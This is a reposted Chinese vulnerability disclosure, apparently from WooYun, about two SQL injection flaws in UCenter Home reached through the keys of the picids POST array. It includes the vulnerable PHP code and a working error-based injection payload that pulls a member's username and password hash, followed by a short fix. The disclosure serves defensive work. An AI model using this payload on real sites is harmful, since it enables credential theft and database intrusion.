记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Ucenter Home最新版SQL注入两处

2014-10-21 02:10

在编辑日志处

文件cp_blog.php:

code 区域
//添加编辑操作

if(submitcheck('blogsubmit')) {



if(empty($blog['blogid'])) {

$blog = array();

} else {

if(!checkperm('allowblog')) {

ckspacelog();

showmessage('no_authority_to_add_log');

}

}



//验证码

if(checkperm('seccode') && !ckseccode($_POST['seccode'])) {

showmessage('incorrect_code');

}



include_once(S_ROOT.'./source/function_blog.php');

if($newblog = blog_post($_POST, $blog)) {

if(empty($blog) && $newblog['topicid']) {

$url = 'space.php?do=topic&topicid='.$newblog['topicid'].'&view=blog';

} else {

$url = 'space.php?uid='.$newblog['uid'].'&do=blog&id='.$newblog['blogid'];

}

showmessage('do_success', $url, 0);

} else {

showmessage('that_should_at_least_write_things');

}

}





注意这里的$newblog = blog_post($_POST, $blog)



更新内容应该是在blog_post函数,跟进。



文件function_blof.php:

code 区域
//添加博客

function blog_post($POST, $olds=array()) {

global $_SGLOBAL, $_SC, $space;



//操作者角色切换

$isself = 1;

if(!empty($olds['uid']) && $olds['uid'] != $_SGLOBAL['supe_uid']) {

$isself = 0;

$__SGLOBAL = $_SGLOBAL;

$_SGLOBAL['supe_uid'] = $olds['uid'];

$_SGLOBAL['supe_username'] = addslashes($olds['username']);

}

......

//获取上传的图片

$uploads = array();

if(!empty($POST['picids'])) {

$picids = array_keys($POST['picids']);

print_r($picids);

$query = $_SGLOBAL['db']->query("SELECT * FROM ".tname('pic')." WHERE picid IN (".simplode($picids).") AND uid='$_SGLOBAL[supe_uid]'");

while ($value = $_SGLOBAL['db']->fetch_array($query)) {

if(empty($titlepic) && $value['thumb']) {

$titlepic = $value['filepath'].'.thumb.jpg';

$blogarr['picflag'] = $value['remote']?2:1;

}

$uploads[$POST['picids'][$value['picid']]] = $value;

}

if(empty($titlepic) && $value) {

$titlepic = $value['filepath'];

$blogarr['picflag'] = $value['remote']?2:1;

}

}



在获取上传图片时,看这里的关键代码:

code 区域
$picids = array_keys($POST['picids']);

$query = $_SGLOBAL['db']->query("SELECT * FROM ".tname('pic')." WHERE picid IN (".simplode($picids).") AND uid='$_SGLOBAL[supe_uid]'");



$picids = array_keys($POST['picids']),获取了picids的数组的全部键值

然后picdis进入了SQL,这里导致了SQL注入。



第二处SQL注入

文件cp_thread.php

code 区域
if(submitcheck('threadsubmit')) {



$tid = $_POST['tid'] = intval($_POST['tid']);

$tagid = empty($_POST['tagid'])?0:intval($_POST['tagid']);



if($eventid && $event['tagid']!=$tagid) {

showmessage('event_mtag_not_match');

}

......//省略

//获取上传的图片

$uploads = array();

if(!empty($_POST['picids'])) {

$picids = array_keys($_POST['picids']);

$query = $_SGLOBAL['db']->query("SELECT * FROM ".tname('pic')." WHERE picid IN (".simplode($picids).") AND uid='$_SGLOBAL[supe_uid]'");

while ($value = $_SGLOBAL['db']->fetch_array($query)) {

if(empty($titlepic) && $value['thumb']) {

$titlepic = pic_get($value['filepath'], $value['thumb'], $value['remote']);

}

$uploads[$_POST['picids'][$value['picid']]] = $value;

}

if(empty($titlepic) && $value) {

$titlepic = pic_get($value['filepath'], $value['thumb'], $value['remote']);

}

}



通用先获取了$_POST['picids']的值,然后直接进入了SQL语句,导致SQL注入



漏洞证明同第一处SQL注入。

漏洞证明:

1、发表一篇日志

2、编辑日志

3、在编辑日志是,上传图片:

666.png



4、然后保存是,抓包,修改POST数据:

修改picids[3]为:

code 区域
picids[3',(select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username, 0x23, password) from uchome_member limit 0,1))a from information_schema.tables group by a)b))#]"



777.png



最后执行的sql语句为:

code 区域
SELECT * FROM uchome_pic WHERE picid IN ('3',(select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username, 0x23, password) from uchome_member limit 0,1))a from information_schema.tables group by a)b))#','4') AND uid='2'



然后看返回:

888.png



888-1.png

修复方案:

进行array_keys后,对获取的keys也进行处理。

知识来源: www.wooyun.org/bugs/wooyun-2014-069690

阅读:66494 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“Ucenter Home最新版SQL注入两处”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云